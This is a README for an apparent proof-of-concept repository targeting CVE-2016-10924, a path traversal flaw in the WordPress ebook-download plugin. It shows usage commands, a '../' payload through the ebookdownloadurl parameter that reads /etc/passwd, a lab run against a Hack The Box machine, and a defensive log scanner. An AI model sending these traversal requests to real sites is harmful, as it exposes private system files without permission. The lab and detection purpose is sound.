
CVE-2016-10924 PoC — WordPress ebook-download plugin path traversal vulnerability

Associated Vulnerability
Title: WordPress ebook-download plugin path traversal vulnerability (CVE-2016-10924)
Description: The ebook-download plugin before 1.2 for WordPress has directory traversal.
Description
Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request. 
Readme
# CVE-2016-10924-POC

This repository contains a Proof-of-Concept (PoC) exploit script for the **Directory Traversal** vulnerability (CVE-2016-10924) found in the WordPress plugin **ebook-download** (versions < 1.2). 

This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called `ebookdownloadurl` to traverse directories on the target server.

## Description

- **CVE-ID:** [CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)  
- **Vulnerability Type:** Directory Traversal  
- **Affected Component:** `ebook-download` plugin < 1.2 for WordPress  
- **Impact:** Remote attackers can read arbitrary files on the underlying operating system, such as `/etc/passwd`, by manipulating the file path in the `ebookdownloadurl` parameter.  

> **Note:** This PoC is for **educational and authorized testing** purposes only. Misuse of this information can lead to legal consequences.

## Requirements

- Python 3.
- `requests` library (install via `pip install requests`)

## Usage

1. **Clone the repository**:
   ```bash
   git clone https://github.com/your-user/CVE-2016-10924-POC.git
   cd CVE-2016-10924-POC
   ```
2. **Install Dependencies**:
   ```bash
   pip install requests
   ```
3. **Run the Exploit**:
   ```bash
   python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
   ```
4. **Specify the file path to read**:
   After launching the script, you will be prompted for a file path. For example:
   ```bash
   ../../../../../../../../../etc/passwd
   ```
   You may need to adjust the number of `../` based on the webroot location in the target environment.

5. **Exit**: 
   - Type `exit`, `quit`, or press **Enter** on an empty prompt to exit.
   - Press **Ctrl + C** to stop the script immediately.

### Example

I used this exploit on "Backdoor", a retired Hack The Box machine:

```bash
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
```
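A defender-side complement to the request shape shown above: this added example (not part of the PoC repository) scans constructed web-server access-log lines for traversal attempts against the plugin's `filedownload.php` endpoint via the `ebookdownloadurl` parameter, percent-decoding repeatedly so encoded forms of `../` are not missed. The log format, endpoint path, client IPs and sample lines are assumptions constructed for the example.

```python
import re
from posixpath import normpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format access-log lines; IPs and the host are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd HTTP/1.1" 200 1431 "-" "python-requests/2.31"
10.0.0.6 - - [10/Mar/2024:12:00:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd HTTP/1.1" 200 1431 "-" "curl/8.0"
10.0.0.7 - - [10/Mar/2024:12:00:03 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=ebooks/guide.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
10.0.0.8 - - [10/Mar/2024:12:00:04 +0000] "GET /index.php?p=../../etc/passwd HTTP/1.1" 404 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)
ENDPOINT = "/wp-content/plugins/ebook-download/filedownload.php"  # assumed plugin path
PARAM = "ebookdownloadurl"


def fully_decode(value, rounds=3):
    """Percent-decode until stable so %2e%2e%2f and double-encoded forms read as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    """True when the value escapes a relative base directory (or is absolute)."""
    decoded = fully_decode(value).replace("\\", "/")
    if decoded.startswith("/"):
        return True
    # normpath collapses 'a/../b'; anything still starting with '..' leaves the base dir
    collapsed = normpath(decoded)
    return collapsed == ".." or collapsed.startswith("../")


def scan_log(text):
    """Return one finding per traversal-looking ebookdownloadurl value sent to the endpoint."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["uri"])
        if parts.path != ENDPOINT:
            continue  # traversal against other endpoints is out of scope for this rule
        for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
            if is_traversal(raw):
                findings.append({"ip": m["ip"], "status": int(m["status"]), "value": fully_decode(raw)})
    return findings
```

A 200 status on a flagged request is the strongest signal, since the vulnerable plugin returns the file body rather than an error.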

## Disclaimer

This project is intended solely for **educational** and **legitimate security testing** purposes.  
**Do not** use the information or scripts within this repository on any system you do not have explicit permission to test.  
Author and contributors are **not** responsible for any misuse or damage caused by this tool.

## License

This project is licensed under the [GNU 2.0 License](LICENSE). Feel free to use and modify it, but please give credit.

---

**References**

- [NVD - CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)
- [WordPress Plugin ebook-download](https://wordpress.org/plugins/ebook-download/#developers) *(for vulnerable versions reference)*